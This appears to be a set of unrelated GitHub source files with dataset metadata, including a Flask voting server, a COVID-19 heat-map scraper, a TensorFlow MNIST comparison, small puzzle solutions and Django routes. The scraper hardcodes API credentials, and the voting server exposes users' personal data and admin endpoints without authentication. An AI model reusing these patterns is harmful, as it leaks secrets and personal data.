                    green_led.value(1) # light the green LED for an authorized card
                    utime.sleep(2) # keep it lit for 2 seconds
                    green_led.value(0)
                else:
                    # Unknown card: show an error pattern on the display.
                    tm.write([0b01101101, 0b01110100, 0b00000110, 0b01111000])
                    print(".....卡片錯誤.....")
                    red_led.value(1) # light the red LED for an unauthorized card
                    utime.sleep(2) # keep it lit for 2 seconds
                    red_led.value(0)
        else:
            print(".....授權錯誤.....")
except KeyboardInterrupt:
    print(".....Bye.....")
3714284428 | from flask import Blueprint, redirect, request, url_for, jsonify
from twilio.rest import Client
from extensions import db
from models import User, Candidate, Role, Vote
from utils import transform_phone_number
import requests
import os
# Blueprint holding every route, plus a Twilio Verify client built from
# environment credentials.
# NOTE(review): Client(...) runs at import time; missing env vars will
# surface here rather than at first use.
main = Blueprint('main', __name__)

account_sid = os.environ.get("ACCOUNT_SID")
auth_token = os.environ.get("AUTH_TOKEN")
verify_sid = os.environ.get("VERIFY_SID")
client = Client(account_sid, auth_token)
@main.route('/')
def index():
    """Debug listing: render every user as an HTML list item."""
    rows = "".join(
        f"<li>{u.username}, {u.dob}, {u.gender}, {u.number}, {u.classOfUser}</li>"
        for u in User.query.all()
    )
    return f"<ul>{rows}</ul>"
@main.route('/enroll_user', methods=['POST'])
def add_user():
    """Register a new user from JSON; 400 on missing or empty fields.

    NOTE(review): the success payload is keyed by the username itself
    ({"<username>": "added"}) — unusual but apparently intentional.
    """
    data = request.json
    # Check if all required fields are present
    required_fields = ['username', 'dob', 'gender', 'number', 'classOfUser']
    missing_fields = [field for field in required_fields if field not in data]
    if missing_fields:
        return jsonify({"error": f"Missing fields: {', '.join(missing_fields)}"}), 400
    username = data['username']
    dob = data['dob']
    gender = data['gender']
    number = data['number']
    classOfUser = data['classOfUser']
    # Check if any of the required fields are empty
    if not all(data[field] for field in required_fields):
        return jsonify({"error": "All fields are required"}), 400
    new_user = User(username=username, dob=dob, gender=gender, number=number, classOfUser=classOfUser)
    db.session.add(new_user)
    db.session.commit()
    user_add_response = {
        username: "added"
    }
    return jsonify(user_add_response), 200

@main.route('/find_user', methods=['POST'])
def find_user():
    """Look up a user by phone number from the JSON body; 404 if unknown."""
    number = request.json.get('number')
    if not number:
        return jsonify({"error": "Phone number is required"}), 400
    user = User.query.filter_by(number=number).first()
    if not user:
        return jsonify({"error": "User not found"}), 404
    user_data = {
        "username": user.username,
        "dob": user.dob,
        "gender": user.gender,
        "number": user.number,
        "classOfUser": user.classOfUser
    }
    return jsonify(user_data), 200

@main.route('/send_otp', methods=['POST'])
def send_otp():
    """Send an SMS OTP via Twilio Verify to a registered user's number."""
    number = request.json.get('number')
    if not number:
        return jsonify({"error": "Phone number is required"}), 400
    user = User.query.filter_by(number=number).first()
    if not user:
        return jsonify({"error": "User not found"}), 404
    # Twilio requires E.164 format, so add the country code first.
    number_with_countrycode = transform_phone_number(number)
    verification = client.verify.v2.services(verify_sid) \
        .verifications \
        .create(to=number_with_countrycode, channel="sms")
    return jsonify({"message": "OTP has been sent"}), 200

@main.route('/confirm_otp', methods=['POST'])
def confirm_otp():
    """Check an OTP against Twilio Verify; on success return the user record."""
    number = request.json.get('number')
    otp = request.json.get('otp')
    if not number or not otp:
        return jsonify({"error": "Phone number and OTP are required"}), 400
    number_with_countrycode = transform_phone_number(number)
    verification_check = client.verify.v2.services(verify_sid) \
        .verification_checks \
        .create(to=number_with_countrycode, code=otp)
    if verification_check.status == "approved":
        user = User.query.filter_by(number=number).first()
        if not user:
            return jsonify({"error": "User not found"}), 404
        return jsonify(user.as_dict()), 200
    else:
        return jsonify({"error": "Invalid OTP"}), 400

# create and populate db
@main.route('/init_setup', methods=['GET'])
def init_setup():
    """One-shot bootstrap: create tables and seed the election roles and
    candidates (every candidate is attached to every role)."""
    db.create_all()
    roles = ["President", "Vice President", "General Secretary", "Financial Secretary"]
    for role in roles:
        new_role = Role(role=role)
        db.session.add(new_role)
        db.session.commit()
    roles = Role.query.all()
    candidates = ["Georgette Nana Yaa Tedeku", "Yenulom Lambon", "Omar Abdul Bakie"]
    for role in roles:
        for candidate in candidates:
            new_candidate = Candidate(role_id=role.id, candidate=candidate)
            db.session.add(new_candidate)
            db.session.commit()
    return jsonify({"message": "Success"}), 200
# get roles
@main.route('/roles', methods=['GET'])
def get_roles():
    """List every role as a JSON array (empty array when none exist)."""
    roles = Role.query.all()
    if not roles:
        return jsonify([]), 200
    roles = [role.as_dict() for role in roles]
    return jsonify(roles), 200

# get role by id
@main.route('/role', methods=['GET'])
def get_role():
    """Fetch one role by the `role_id` query parameter (defaults to 1)."""
    role_id = request.args.get('role_id', default = 1, type = int)
    role = Role.query.filter_by(id=role_id).first()
    if not role:
        return jsonify({"error": "Role not found"}), 404
    role = role.as_dict()
    return jsonify(role), 200

# create role
@main.route('/create_role', methods=['POST'])
def create_role():
    """Create a role from the `role` field in the JSON body."""
    role = request.json.get('role')
    if not role:
        return jsonify({"error": "Role field is required"}), 400
    new_role = Role(role=role)
    db.session.add(new_role)
    db.session.commit()
    return jsonify({"message": "Role added"}), 200

# create dummy roles
@main.route('/create_dummy_roles', methods=['POST'])
def create_dummy_roles():
    """Seed a fixed set of four roles (development helper)."""
    roles = ["President", "Vice President", "General Secretary", "Financial Secretary"]
    for role in roles:
        new_role = Role(role=role)
        db.session.add(new_role)
        db.session.commit()
    return jsonify({"message": "Roles added"}), 200

# get candidates for a role as a param
@main.route('/candidates', methods=['GET'])
def get_candidates():
    """List candidates for the role given by `role_id` (defaults to 1)."""
    role_id = request.args.get('role_id', default = 1, type = int)
    candidates = Candidate.query.filter_by(role_id=role_id).all()
    if not candidates:
        return jsonify([]), 200
    candidates = [candidate.as_dict() for candidate in candidates]
    return jsonify(candidates), 200

# create candidate for a role
@main.route('/create_candidate', methods=['POST'])
def create_candidate():
    """Attach a new candidate to an existing role (both from JSON body)."""
    role_id = request.json.get('role_id')
    candidate = request.json.get('candidate')
    if not role_id or not candidate:
        return jsonify({"error": "Role and candidate fields are required"}), 400
    role = Role.query.filter_by(id=role_id).first()
    if not role:
        return jsonify({"error": "Role not found"}), 404
    new_candidate = Candidate(role_id=role.id, candidate=candidate)
    db.session.add(new_candidate)
    db.session.commit()
    return jsonify({"message": "Candidate added"}), 200

# create dummy candidates
@main.route('/create_dummy_candidates', methods=['POST'])
def create_dummy_candidates():
    """Seed five placeholder candidates for every role (development helper)."""
    roles = Role.query.all()
    candidates = ["Barak", "Trump", "Addo", "Harris", "Bob"]
    for role in roles:
        for candidate in candidates:
            new_candidate = Candidate(role_id=role.id, candidate=candidate)
            db.session.add(new_candidate)
            db.session.commit()
    return jsonify({"message": "Candidates added"}), 200

# Has user voted for role
@main.route('/has_user_voted', methods=['POST'])
def has_user_voted():
    """Report whether the user (by phone number) already voted for a role."""
    number = request.json.get('number')
    role_id = request.json.get('role_id')
    user = User.query.filter_by(number=number).first()
    if not user:
        return jsonify({"error": "User not found"}), 404
    role = Role.query.filter_by(id=role_id).first()
    if not role:
        return jsonify({"error": "Role not found"}), 404
    # check if votes contain user_id and role_id
    already_voted = Vote.query.filter_by(user_id=user.id, roles_id=role.id).first()
    if already_voted:
        return jsonify({ "status": True }), 200
    else:
        return jsonify({ "status": False }), 200
# vote for a candidate
@main.route('/vote', methods=['POST'])
def vote():
    """Record a vote (user phone number, role, candidate from JSON body).

    Rejects the request if any referenced entity is missing or if the
    user has already voted for this role.
    """
    number = request.json.get('number')
    role_id = request.json.get('role_id')
    candidate_id = request.json.get('candidate_id')
    if not number or not role_id or not candidate_id:
        return jsonify({"error": "Phone number, role and candidate fields are required"}), 400
    user = User.query.filter_by(number=number).first()
    if not user:
        return jsonify({"error": "User not found"}), 404
    role = Role.query.filter_by(id=role_id).first()
    if not role:
        return jsonify({"error": "Role not found"}), 404
    candidate = Candidate.query.filter_by(id=candidate_id).first()
    if not candidate:
        return jsonify({"error": "Candidate not found"}), 404
    # check if votes contain user_id and role_id
    already_voted = Vote.query.filter_by(user_id=user.id, roles_id=role.id).first()
    if already_voted:
        return jsonify({"error": "User has already voted for this role"}), 400
    new_vote = Vote(user_id=user.id, roles_id=role.id, candidate_id=candidate.id)
    db.session.add(new_vote)
    db.session.commit()
    return jsonify({"message": "Vote added"}), 200

# get results for a role
@main.route('/results', methods=['POST'])
def get_results():
    """Tally votes per candidate for the role given in the JSON body.

    Returns parallel `candidates` / `votes` arrays plus the role name.
    """
    role_id = request.json.get('role_id')
    if not role_id:
        return jsonify({"error": "Role field is required"}), 400
    role = Role.query.filter_by(id=role_id).first()
    if not role:
        return jsonify({"error": "Role not found"}), 404
    candidates = Candidate.query.filter_by(role_id=role.id).all()
    if not candidates:
        return jsonify({"message": "No candidates found for role"}), 404
    # get votes for each candidate
    votes = []
    for candidate in candidates:
        vote_count = Vote.query.filter_by(candidate_id=candidate.id).count()
        votes.append(vote_count)
    # get candidate names
    candidate_names = [candidate.candidate for candidate in candidates]
    # create json object
    results = {
        "role": role.role,
        "candidates": candidate_names,
        "votes": votes
    }
    return jsonify(results), 200
| CozyBrian/voting-server | routes.py | routes.py | py | 10,264 | python | en | code | 0 | github-code | 90 |
33687052749 | import random
print("==> NUMBER GUESSING GAME <==")
#win_number = 500
#count = 1
#guess_number = int(input("Kindly pick a random number from 1 to 100: "))
def set_difficulty():
    """Ask the player for a difficulty; EASY grants 10 turns, anything else 5."""
    level = input("Choose a difficulty. Type 'EASY' or 'HARD': ").lower()
    if level == "easy":
        return 10 # return 10 chances
    else:
        return 5
def check_answer(guess, answer, turns):
    """
    Compare `guess` against `answer`, print a hint, and return the number
    of turns remaining.

    Bug fixes: the original compared the *global* ``guess_number``
    instead of the ``guess`` parameter, and returned None on a correct
    guess, which then clobbered the caller's turn counter.
    """
    if guess > answer:
        print("Too high, Please try again")
        return turns - 1
    elif guess < answer:
        print("Too low, Please try again")
        return turns - 1
    else:
        print(f"\nYou got it...the answer is {answer}")
        return turns
# Main game loop: keep prompting until the player guesses `answer`
# or runs out of turns.
answer = random.randint(1, 100)
turns = set_difficulty()
guess_number = 0
while guess_number != answer:
    guess_number = int(input("Kindly pick a random number from 1 to 100: "))
    turns = check_answer(guess_number, answer, turns)
    print(f"\nYou have {turns} attempts remainings to guess the number \n")
    if turns == 0:
        print("\nYou are out of attempt")
        break
print(f"\nYou have {turns} attempts remainings to guess the number \n")
#Random number 2
import random
class Dice:
    """A pair of six-sided dice."""

    def roll(self):
        """Return one roll of both dice as a (die1, die2) tuple."""
        return (random.randint(1, 6), random.randint(1, 6))

dice = Dice()
print(dice.roll())
| Innocentsax/Python_Series | Bootcamp/guess_number_game.py | guess_number_game.py | py | 1,323 | python | en | code | 29 | github-code | 90 |
2925293970 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 2 19:00:58 2020
@author: bob
"""
import pandas as pd
import numpy as np
import requests
import folium
import webbrowser
from folium.plugins import HeatMap
def city(province):
    '''
    Flatten one province-level record (used for regions such as Hong Kong
    and Macau that report no per-city breakdown).

    province: dict with provinceName/confirmedCount/suspectedCount/
              curedCount/deadCount keys
    return: [name, confirmed, suspected, cured, dead]
    '''
    fields = ('provinceName', 'confirmedCount', 'suspectedCount',
              'curedCount', 'deadCount')
    return [province[key] for key in fields]
def requestData():
    '''
    Fetch the latest epidemic data from the web API and save it to the
    current directory as <date>.csv.
    return: the saved file name (<date>.csv)
    '''
    # Data update endpoint (credentials are embedded in the URL).
    url = 'http://tianqiapi.com/api?version=epidemic&appid=23035354&appsecret=8YvlPNrz'
    # The endpoint returns JSON; load it straight into a DataFrame.
    data = pd.read_json(url, orient='colums')
    # The payload of interest lives under the 'data' column.
    Epidemic_data = data['data']
    # Date stamp of this data snapshot (date part only).
    Data_date = Epidemic_data['date'].split()[0]
    #columns = ['provinceName', 'cityName', 'confirmed', 'suspected', 'cured', 'dead']
    columns = ['cityName', 'confirmed', 'suspected', 'cured', 'dead']
    # Accumulator DataFrame for the whole country.
    China_Data = pd.DataFrame(columns=['provinceName',
                                       'cityName',
                                       'confirmed',
                                       'suspected',
                                       'cured',
                                       'dead'])
    # Per-province records.
    Country_Data = Epidemic_data['area']
    for province in Country_Data: # iterate over every province
        provinceName = province['preProvinceName'] # province name
        try:
            ProvinceData = province['cities'] # all city records of this province
            city_Data = []
            # NOTE(review): the inner loop reuses the name `province`,
            # shadowing the outer loop variable.
            for province in ProvinceData: # iterate over every city
                city_Data.append(list(province.values()))
            # Build a DataFrame for this province's cities.
            CityData = pd.DataFrame(np.array(city_Data), columns=columns)
            # Add the province name as a new column.
            CityData['provinceName'] = provinceName
            # Append to the country-wide accumulator.
            China_Data = pd.concat([China_Data, CityData], ignore_index=True)
        except:# handle single-city regions (Hong Kong, Macau, ...); same logic
            # NOTE(review): bare except — any failure falls through here.
            CityData = pd.DataFrame(np.array([city(province)]), columns=columns)
            CityData['provinceName'] = provinceName
            China_Data = pd.concat([China_Data, CityData], ignore_index=True)
            #print(CityData)
            #print(pd.DataFrame(np.array([city(province)]), columns=columns))
            #none_City.append(city(province))
    # Index by (province, city) and save as CSV.
    China_Data.set_index(['provinceName', 'cityName'], inplace=True)
    # The output file is named after the data snapshot date.
    fileName = Data_date + '.csv'
    China_Data.to_csv(fileName)
    return fileName
def getCityLocation(cityList):
    '''
    Geocode every city name via the Baidu Maps API.

    cityList: list of city names
    return: DataFrame with columns cityName/longitude/latitude
            (cities that fail to geocode are silently skipped)
    '''
    url = "http://api.map.baidu.com/geocoder/v2/"
    header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36'}
    # NOTE(review): the API key ('ak') is hardcoded — should come from
    # configuration, not source control.
    payload = {
            'output':'json',
            'ak':'X8zlxPUdSe2weshrZ1WqnWxb43cfBI2N'
            }
    addinfo = []
    for city in cityList:
        payload['address'] = city
        try:
            content = requests.get(url,params=payload,headers=header).json()
            longitude = content['result']['location']['lng']
            latitude = content['result']['location']['lat']
            addinfo.append([city, longitude, latitude])
            #addinfo.append(content['result']['location'])
            print("正在获取{}的地址!".format(city))
        except:
            # NOTE(review): bare except — network and parse errors are
            # both swallowed; the city is simply dropped.
            print("地址{}获取失败,请稍后重试!".format(city))
            pass
        #time.sleep(.1)
    columns = ['cityName', 'longitude', 'latitude']
    data = pd.DataFrame(np.array(addinfo), columns=columns)
    #print(data)
    print("所有地址均已获取完毕!!!")
    return(data)
def Visualization(UpdateData):
    """Render a folium heat map of confirmed cases and open it in a browser.

    UpdateData: DataFrame with latitude/longitude/confirmed columns
    (rows with missing coordinates must already be dropped).
    """
    latitude = np.array(UpdateData["latitude"])
    longitude = np.array(UpdateData["longitude"])
    confirmed = np.array(UpdateData["confirmed"],dtype=float)
    # HeatMap expects [lat, lon, weight] triples.
    Vis_Data = [[latitude[i],longitude[i],confirmed[i]] for i in range(len(UpdateData))]
    # Map centered roughly on Wuhan (30N, 114E).
    map_osm = folium.Map(location=[30,114],zoom_start=10)
    HeatMap(Vis_Data).add_to(map_osm)
    file_path = r"Visualization.html"
    map_osm.save(file_path) # save locally
    webbrowser.open(file_path) # open in the local browser
# Pipeline: download today's data, geocode the cities, join the
# coordinates back on, and render the heat map.
fileName = requestData() # fetch today's data and get the CSV file name
data = pd.read_csv(fileName) # read the raw data back
cityList = data['cityName'].tolist() # list of all city names
location = getCityLocation(cityList) # geocode every city
UpdateData = pd.merge(data, location, # attach longitude/latitude
                      on='cityName',
                      how = 'left')
#UpdateData.to_csv('Visualization_Data.csv')
VisualData = UpdateData.dropna() # drop rows that failed to geocode
Visualization(VisualData)
| HanMENG15990045033/Epidemic_2020 | 03Epidemic_2020/Epidemic_Data.py | Epidemic_Data.py | py | 5,820 | python | en | code | 4 | github-code | 90 |
17976110439 | import sys
# Competitive-programming boilerplate: fast stdin aliases and common
# constants (only `read` is used by main below).
read = sys.stdin.read
readline = sys.stdin.readline
readlines = sys.stdin.readlines
sys.setrecursionlimit(10 ** 9)
INF = 1 << 60
MOD = 1000000007
def main():
    """Read integers A and B; print 'Possible' when A, B, or A+B is
    divisible by 3, otherwise 'Impossible'."""
    a, b = map(int, read().split())
    divisible = any(v % 3 == 0 for v in (a, b, a + b))
    print('Possible' if divisible else 'Impossible')

if __name__ == '__main__':
    main()
| Aasthaengg/IBMdataset | Python_codes/p03657/s952517566.py | s952517566.py | py | 378 | python | en | code | 0 | github-code | 90 |
18029735589 | # -*- coding: utf-8 -*-
import sys
# Competitive-programming boilerplate; note that `input` is rebound to a
# fast stdin reader below.
sys.setrecursionlimit(10**9)
INF=10**18
MOD=10**9+7
input=lambda: sys.stdin.readline().rstrip()
YesNo=lambda b: bool([print('Yes')] if b else print('No'))
YESNO=lambda b: bool([print('YES')] if b else print('NO'))
int1=lambda x:int(x)-1
def main():
    """Read N, A, B and N positions X; for each adjacent gap pay the
    cheaper of walking (A per unit) or the flat fare B, and print the
    total."""
    N,A,B=map(int,input().split())
    X=list(map(int,input().split()))
    # A gap wider than B//A units makes the flat fare B cheaper.
    z=B//A
    ans=0
    for i in range(N-1):
        if X[i+1]-X[i]>z:
            ans+=B
        else:
            ans+=(X[i+1]-X[i])*A
    print(ans)
if __name__ == '__main__':
    main()
| Aasthaengg/IBMdataset | Python_codes/p03829/s402979084.py | s402979084.py | py | 549 | python | en | code | 0 | github-code | 90 |
8286375281 | # -*- coding: utf-8 -*-
"""
Created on Thu May 11 11:20:33 2017
@author: darren
"""
import tensorflow as tf
import sys
import os
#versioning, urllib named differently for dif python versions
if sys.version_info[0] >= 3:
    from urllib.request import urlretrieve
else:
    from urllib import urlretrieve

# tsv is the file which contain the label of each picture.
# png is the file which put all of the small picture together.
# obtain the location where you run the code
os_location=os.getcwd()
# Everything (MNIST data, summaries, embedding assets) lives here.
LOGDIR = os_location+'/embedding_data/'
GITHUB_URL ='https://raw.githubusercontent.com/darren1231/Tensorflow_tutorial/master/10_hidden_mnist_embedding/'
# Download MNIST plus the sprite/label files used by the TensorBoard
# embedding projector.
mnist = tf.contrib.learn.datasets.mnist.read_data_sets(train_dir=LOGDIR + 'data', one_hot=True)
urlretrieve(GITHUB_URL + 'labels_1024.tsv', LOGDIR + 'labels_1024.tsv')
urlretrieve(GITHUB_URL + 'sprite_1024.png', LOGDIR + 'sprite_1024.png')
def weight_variable(shape):
    """Weight tensor initialized from a truncated normal (stddev 0.1)."""
    return tf.Variable(tf.truncated_normal(shape, stddev=0.1))

def bias_variable(shape):
    """Bias tensor initialized to the constant 0.1."""
    return tf.Variable(tf.constant(0.1, shape=shape))

def conv2d(x, w):
    """2-D convolution with stride 1 and SAME padding."""
    return tf.nn.conv2d(x, w, strides=[1, 1, 1, 1], padding='SAME')

def max_pool_2x2(x):
    """2x2 max-pooling with stride 2 and SAME padding."""
    return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def cnn_model():
    """Build a two-conv-layer MNIST classifier graph (TF1 style).

    Architecture: 28x28x1 -> conv5x5x32 -> pool -> conv5x5x64 -> pool
    -> fc1024 -> softmax(10).  The softmax output doubles as the
    embedding fed to the TensorBoard projector.

    Returns (input placeholder, label placeholder, softmax output,
    embedding tensor, embedding size).
    """
    desired_input = tf.placeholder(tf.float32,[None,784])
    desired_output = tf.placeholder(tf.float32,[None,10])
    x_image = tf.reshape(desired_input,[-1,28,28,1])
    #network weights
    with tf.name_scope("cnn_net"):
        with tf.name_scope("w_conv_1"):
            w_conv1= weight_variable([5,5,1,32])
            b_conv1= bias_variable([32])
            tf.summary.histogram("w_conv1",w_conv1)
            tf.summary.histogram("b_conv1",b_conv1)
        with tf.name_scope("w_conv_2"):
            w_conv2 = weight_variable([5,5,32,64])
            b_conv2 = bias_variable([64])
            tf.summary.histogram("w_conv2",w_conv2)
            tf.summary.histogram("b_conv2",b_conv2)
        with tf.name_scope("fc1"):
            w_fc1 = weight_variable([7*7*64,1024])
            b_fc1 = bias_variable([1024])
            tf.summary.histogram("w_fc1",w_fc1)
            tf.summary.histogram("b_fc1",b_fc1)
        with tf.name_scope("fc2"):
            w_fc2 = weight_variable([1024,10])
            b_fc2 = bias_variable([10])
            tf.summary.histogram("w_fc2",w_fc2)
            tf.summary.histogram("b_fc2",b_fc2)
    with tf.name_scope("conv1"):
        h_conv1 = tf.nn.relu(conv2d(x_image,w_conv1)+b_conv1)
        h_pool1 = max_pool_2x2(h_conv1)
    with tf.name_scope("conv2"):
        h_conv2 = tf.nn.relu(conv2d(h_pool1,w_conv2)+b_conv2)
        h_pool2 = max_pool_2x2(h_conv2)
    with tf.name_scope("fully_connected"):
        # Two rounds of 2x2 pooling shrink 28x28 to 7x7.
        h_pool2_flat = tf.reshape(h_pool2,[-1,7*7*64])
        h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat,w_fc1)+b_fc1)
        net_output = tf.nn.softmax(tf.matmul(h_fc1,w_fc2)+b_fc2)
    # The 10-dim softmax output is used as the projector embedding.
    embedding_input = net_output
    embedding_size = 10
    return desired_input,desired_output,net_output,embedding_input,embedding_size
def hidden_model():
    """Build a single-layer 784->10 softmax classifier graph (TF1 style).

    Returns the same 5-tuple as cnn_model() so the two are
    interchangeable in train_model().
    """
    desired_input = tf.placeholder(tf.float32,[None,784])
    desired_output = tf.placeholder(tf.float32,[None,10])
    with tf.name_scope("784_10_network"):
        with tf.name_scope("weights"):
            weights = tf.Variable(tf.zeros([784,10]))
            tf.summary.histogram("weights",weights)
        with tf.name_scope("biases"):
            biases = tf.Variable(tf.zeros([10]))
            tf.summary.histogram("biases",biases)
        with tf.name_scope("net_output"):
            net_output=tf.nn.softmax(tf.matmul(desired_input,weights)+biases)
            # The 10-dim softmax output doubles as the projector embedding.
            embedding_input = net_output
            embedding_size = 10
            tf.summary.histogram("net_output",net_output)
    return desired_input,desired_output,net_output,embedding_input,embedding_size
def train_model(use_cnn,learning_rate):
    """Train one model (CNN or single-layer) and log everything to
    TensorBoard: scalars, histograms, input images, checkpoints, and an
    embedding of the first 1024 test samples for the projector.

    use_cnn: True for cnn_model(), False for hidden_model()
    learning_rate: Adam learning rate (also part of the run name)
    """
    tf.reset_default_graph()
    if use_cnn:
        desired_input,desired_output,net_output,embedding_input,embedding_size=cnn_model()
#        embedding_name="hidden_1024"
        experiment_name="cnn_net"+str(learning_rate)+"/"
    else:
        desired_input,desired_output,net_output,embedding_input,embedding_size=hidden_model()
#        embedding_name="output_10"
        experiment_name="hidden_net"+str(learning_rate)+"/"
    with tf.name_scope("train"):
        with tf.name_scope("loss"):
            # Cross-entropy averaged over the batch.
            # NOTE(review): tf.log on a raw softmax can hit log(0);
            # softmax_cross_entropy_with_logits would be numerically safer.
            loss_cross_entrop =tf.reduce_mean(-tf.reduce_sum(desired_output* \
                                 tf.log(net_output),reduction_indices=[1]))
            tf.summary.scalar("loss",loss_cross_entrop)
        with tf.name_scope("train_step"):
            train_step = tf.train.AdamOptimizer(learning_rate).minimize(loss_cross_entrop)
        with tf.name_scope("accuracy"):
            # tf.arg_max is the old deprecated alias of tf.argmax (TF1-era code).
            correct_prediction = tf.equal(tf.arg_max(desired_output,1),tf.arg_max(net_output,1))
            accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))
            tf.summary.scalar("accuracy",accuracy)
    # If you want to see the picture in tensorboard, you can use summary.image
    # function. The max number of pictures is 3 and present in gray scale(1).
    # If you want to use RGB instead, you should change 1 to 3.
    x_image = tf.reshape(desired_input, [-1, 28, 28, 1])
    tf.summary.image('input', x_image, 3)
    #tensorboard merged all
    merged= tf.summary.merge_all()
    #intiialize embedding matrix as 0s
    embedding = tf.Variable(tf.zeros([1024, embedding_size]), name="embedding")
    #give it calculated embedding
    assignment = embedding.assign(embedding_input)
    saver = tf.train.Saver()
    sess = tf.Session()
    init = tf.global_variables_initializer()
    sess.run(init)
    writer = tf.summary.FileWriter(LOGDIR+experiment_name,sess.graph)
    writer.add_graph(sess.graph)
    ## Format: tensorflow/contrib/tensorboard/plugins/projector/projector_config.proto
    config = tf.contrib.tensorboard.plugins.projector.ProjectorConfig()
    ## You can add multiple embeddings. Here we add only one.
    embedding_config = config.embeddings.add()
    embedding_config.tensor_name = embedding.name
    embedding_config.sprite.image_path = LOGDIR + 'sprite_1024.png'
    embedding_config.metadata_path = LOGDIR +  'labels_1024.tsv'
    # Specify the width and height of a single thumbnail.
    embedding_config.sprite.single_image_dim.extend([28, 28])
    tf.contrib.tensorboard.plugins.projector.visualize_embeddings(writer, config)
    for i in range(5001):
        batch_desired_input,batch_desired_output = mnist.train.next_batch(100)
        sess.run(train_step,feed_dict={desired_input:batch_desired_input, \
                                       desired_output:batch_desired_output})
        # Every 200 steps: log test accuracy and training summaries.
        if i%200==0:
            print ("step:",i," accuracy:",sess.run(accuracy,feed_dict={desired_input:mnist.test.images[:1024], \
                                                   desired_output:mnist.test.labels[:1024]}))
            summary_data=sess.run(merged,feed_dict={desired_input:batch_desired_input, \
                                                    desired_output:batch_desired_output})
            writer.add_summary(summary_data,i)
        # Every 1000 steps: refresh the embedding and checkpoint the model.
        if i%1000==0:
            sess.run(assignment, feed_dict={desired_input: mnist.test.images[:1024], desired_output: mnist.test.labels[:1024]})
            #save checkpoints
            saver.save(sess, os.path.join(LOGDIR, "model.ckpt"), i)
def main():
    """Run the experiment sweep: every learning rate, with and without a CNN."""
    sweep_rates = [1e-3, 1e-4, 1e-5]
    for lr in sweep_rates:
        for with_cnn in [False, True]:
            print ("use_cnn:", with_cnn, " learning_rate:", lr)
            train_model(with_cnn, lr)
if __name__ == '__main__':
main() | darren1231/Tensorflow_tutorial | 11_compare_cnn_hidden/compare_cnn_hidden.py | compare_cnn_hidden.py | py | 7,911 | python | en | code | 0 | github-code | 90 |
41423570676 | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 24 13:41:56 2022
@author: Sasuke
"""
#importing neccesary modules
import sys
import os
from collections import Counter
#defining circuit start and end tokens
CIRCUIT_START = ".circuit"
CIRCUIT_END = ".end"
ROOT_dir = os.getcwd() #gets your root directory
#tokenizer
def tokenizer(line):
    '''
    Parameters
    ----------
    line : A string of space separated values describing one circuit
        element from a SPICE-style netlist.

    Returns
    -------
    A dictionary mapping field names to the element's values (insertion
    order: name, nodes, ..., value), or -1 when the line does not
    contain exactly 4, 5 or 6 tokens.
    '''
    # Field layout per token count: plain R/L/C/source (4), a current
    # controlled source referencing a voltage source (5), and a voltage
    # controlled source referencing two extra nodes (6).
    field_names = {
        4: ("name", "node0", "node1", "value"),
        5: ("name", "node0", "node1", "source_voltage", "value"),
        6: ("name", "node0", "node1", "source_node0", "source_node1", "value"),
    }
    tokens = line.split()
    names = field_names.get(len(tokens))
    if names is None:
        return -1  # unsupported number of fields on this line
    # dict(zip(...)) preserves the same insertion order the original
    # per-branch assignments produced, which callers rely on (.values()).
    return dict(zip(names, tokens))
# Exactly one argument is expected: the netlist file name.
assert len(sys.argv) == 2,"Please Input only the file name" # output for wrong number of inputs
file_path = os.path.join(ROOT_dir, sys.argv[1]) # file location relative to the working directory
assert file_path.find("netlist") != -1, "Invalid file" # incorrect filename entered
try:
    with open(file_path, "r") as f:
        text = f.read().splitlines()
        # Each of the start/end tokens must occur exactly once in the file.
        occurence = Counter(text) # counting token occurrences
        assert occurence[CIRCUIT_START] ==1 and occurence[CIRCUIT_END] == 1, " INVALID FILE FORMAT, file contains incorrect number of start or end token"
        answer = []
        try:
            start_idx = text.index(CIRCUIT_START) + 1
            end_idx = text.index(CIRCUIT_END)
            assert start_idx<=end_idx #start_idx should be less or equal to end_idx
            for _ in range(start_idx, end_idx): # iterating through every line between the markers
                line = text[_].split("#")[0]
                # NOTE(review): tokenizer() returns -1 for malformed lines, so
                # .values() raises AttributeError there and we fall into the
                # bare except below. reversed(dict.values()) needs Python 3.8+.
                answer.append(" ".join(reversed(tokenizer(line).values()))) # reversing tokens and joining them
            print(*reversed(answer), sep = '\n') # print the lines in reversed order
        except:
            # NOTE(review): bare except also hides unrelated bugs; narrowing to
            # (AttributeError, AssertionError) would be safer.
            print("Invalid file formating") # output for incorrect format
except FileNotFoundError as FNFE:
    print(FNFE) # output if no file is found
| sasuke-ss1/EE2703 | Week 1/week1_code.py | week1_code.py | py | 2,809 | python | en | code | 1 | github-code | 90 |
15420570006 | from django.conf import settings
from django.conf.urls.static import static
from django.urls import path
from django.views.decorators.cache import cache_page
from posts import views
# Namespace used for reversing, e.g. reverse('posts:post-detail').
app_name = 'posts'
urlpatterns = [
    path('', views.HomePageView.as_view(), name='index'),
    path('posts', views.PostsListView.as_view(), name='post-list'),
    # Category/tag listings are cached for 15 minutes (60 * 15 seconds).
    path('category/', cache_page(60 * 15)(views.CategoriesListView.as_view()), name='category-list'),
    path('tag/', cache_page(60 * 15)(views.TagsListView.as_view()), name='tags-list'),
    path('tag/<slug:slug>/', cache_page(60 * 15)(views.TagDetailView.as_view()), name='tag-detail'),
    path('category/<slug:slug>/', cache_page(60 * 15)(views.CategoryDetailView.as_view()), name='category-detail'),
    # Fixed prefixes must stay above the bare '<slug:slug>/' catch-all below,
    # otherwise 'mine/' and 'create/' would be matched as post slugs.
    path('mine/', views.ManagePostListView.as_view(), name='manage_post_list'),
    path('create/', views.PostCreateView.as_view(), name='post_create'),
    path('<slug:slug>/', views.PostDetailView.as_view(), name='post-detail'),
    path('<slug:slug>/edit/', views.PostUpdateView.as_view(), name='post_edit'),
    path('<slug:slug>/delete/', views.PostDeleteView.as_view(), name='post_delete'),
]
# Serve uploaded media through Django only during development.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL,
                          document_root=settings.MEDIA_ROOT)
| moskalec/news | news/posts/urls.py | urls.py | py | 1,278 | python | en | code | 0 | github-code | 90 |
